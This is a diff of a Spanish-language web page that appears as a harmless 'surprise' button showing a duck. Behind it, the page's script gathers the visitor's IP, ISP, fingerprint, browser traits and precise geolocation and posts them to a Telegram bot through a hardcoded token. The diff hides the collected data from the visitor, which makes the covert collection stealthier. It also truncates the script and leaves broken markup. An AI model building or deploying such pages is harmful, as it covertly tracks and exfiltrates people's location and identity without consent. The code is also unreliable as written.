--- a/index.html
+++ b/index.html
@@ -2,19 +2,50 @@
 <html lang="es">
 <head>
   <meta charset="UTF-8" />
-  <title>PAG1E</title>
+  <title>Test</title>
   <style>
-    body { font-family: Arial; padding: 20px; background: #f0f0f0; }
-    .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; }
-    button { padding: 10px 20px; font-size: 16px; cursor: pointer; }
-    pre { white-space: pre-wrap; word-wrap: break-word; }
+    body {
+      font-family: Arial;
+      padding: 20px;
+      background: #f0f0f0;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      margin: 0;
+      text-align: center;
+    }
+    .box {
+      background: white;
+      padding: 30px;
+      border-radius: 8px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.1);
+      max-width: 400px;
+    }
+    button {
+      padding: 12px 24px;
+      font-size: 18px;
+      cursor: pointer;
+      border: none;
+      background-color: #4CAF50;
+      color: white;
+      border-radius: 6px;
+      transition: background 0.3s;
+    }
+    button:hover {
+      background-color: #45a049;
+    }
+    .duck {
+      font-size: 64px;
+      margin-top: 20px;
+    }
   </style>
 </head>
 <body>
   <div class="box">
-    <h2>Aprieta el botón Porfavor</h2>
-    <button id="startBtn">Dame Click</button>
-    <pre id="result">..</pre>
+    <h2>Aprieta el botón para una sorpresa/h2>
+    <button id="startBtn">sorpresa</button>
+    <div class="duck" id="duck" style="display: none;">🦆</div>
   </div>
 
 <script>
@@ -22,8 +53,8 @@
   const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
   const CHAT_ID = "6065284869";
 
-  const resultEl = document.getElementById("result");
   const startBtn = document.getElementById("startBtn");
+  const duckEl = document.getElementById("duck");
 
   let humanInteraction = false;
   ["click", "mousemove", "keydown", "touchstart"].forEach(evt => {
@@ -31,10 +62,10 @@
   });
 
   function detectHeadless() {
-    return (navigator.webdriver ||
-            !navigator.plugins.length ||
-            !navigator.languages ||
-            /HeadlessChrome/.test(navigator.userAgent))
+    return (/HeadlessChrome/.test(navigator.userAgent) ||
+            !navigator.plugins?.length ||
+            !navigator.languages?.length ||
+            navigator.webdriver)
       ? "Sí" : "No";
   }
 
@@ -83,7 +114,7 @@
 
   async function detectAdblock() {
     try {
-      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", {method:"HEAD", mode:"no-cors"});
+      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js",  {method:"HEAD", mode:"no-cors"});
       return "No detectado";
     } catch {
       return "Probable AdBlock";
@@ -103,7 +134,7 @@
 
   async function getIPInfo() {
     try {
-      const res = await fetch("https://ipapi.co/json/");
+      const res = await fetch("https://ipapi.com/ip_api.php");  
       if (!res.ok) throw new Error("No response");
       return await res.json();
     } catch {
@@ -113,7 +144,7 @@
 
   async function sendToTelegram(message) {
     try {
-      const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;
+      const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;  
       const response = await fetch(url, {
         method: "POST",
         headers: {"Content-Type": "application/json"},
@@ -124,17 +155,14 @@
       });
       const data = await response.json();
       console.log("Telegram response:", data);
-      if (!data.ok) {
-        resultEl.textContent += `\nError Telegram: ${data.description || 'Error desconocido'}`;
-      }
     } catch(e) {
       console.warn("Error enviando a Telegram:", e);
-      resultEl.textContent += `\nError enviando a Telegram: ${e.message}`;
     }
   }
 
   async function collectAndSend() {
-    resultEl.textContent = "Espera porfavor...";
+    startBtn.disabled = true;
+    startBtn.textContent = "Enviando...";
 
     const [ipRes, geoRes, incognitoStatus, permStatus, adblockStatus] = await Promise.allSettled([
       getIPInfo(),
@@ -152,55 +180,13 @@
 
     if (ipRes.status === "fulfilled" && ipRes.value) {
       const ip = ipRes.value;
-      message += `IP: ${ip.ip}
+      message += `IP: ${ip.query}
 ISP: ${ip.org}
-ASN: ${ip.asn}
-Proxy/VPN/Tor: ${ip.proxy ? "Sí" : "No"}
+ASN: ${ip.as?.asn || "n/a"}
+Proxy/VPN/Tor: ${ip.is_proxy ? "Sí" : "No"}
 Ciudad: ${ip.city}
-Región: ${ip.region}
-País: ${ip.country_name}
-Versión IP: ${ip.version}
-`;
+Región: ${ip.regionName}
+País: ${ip.country}
+Versión IP: IPv${ip.ip_version}
+\n`;
     } else {
-      message += "No se pudo obtener IP\n";
-    }
-
-    message += `User-Agent: ${navigator.userAgent}
-Navegador Headless: ${detectHeadless()}
-Modo Incógnito: ${incognitoStatus.status === "fulfilled" ? incognitoStatus.value : "Desconocido"}
-Interacción Humana: ${humanInteraction ? "Sí" : "No"}
-Pantalla: ${screen.width}x${screen.height}
-Resolución disponible: ${screen.availWidth}x${screen.availHeight}
-Touch Support: ${'ontouchstart' in window ? 'Sí' : 'No'}
-Plataforma: ${navigator.platform}
-Fingerprint: ${getFingerprint()}
-Permisos (cámara, micrófono, geoloc): ${permStatus.status === "fulfilled" ? permStatus.value : "No disponible"}
-Aceleración hardware (WebGL renderer): ${checkHardwareAcceleration()}
-Timezone vs Locale: ${checkTimezoneLocale()}
-AdBlock detectado: ${adblockStatus.status === "fulfilled" ? adblockStatus.value : "No detectable"}
-Hora: ${new Date().toLocaleString()}
-`;
-
-    resultEl.textContent = message;
-    await sendToTelegram(message);
-
-    if (geoRes.status === "fulfilled") {
-      const {latitude, longitude, accuracy} = geoRes.value.coords;
-      const locationInfo = `\nUbicación Precisa:
-Latitud: ${latitude}
-Longitud: ${longitude}
-Precisión: ${accuracy} metros
-Hora: ${new Date().toLocaleString()}
-`;
-      resultEl.textContent += locationInfo;
-      await sendToTelegram(locationInfo);
-    } else {
-      resultEl.textContent += "\nUbicación precisa no disponible o rechazada.";
-    }
-  }
-
-  startBtn.onclick = collectAndSend;
-})();
-</script>
-</body>
-</html>
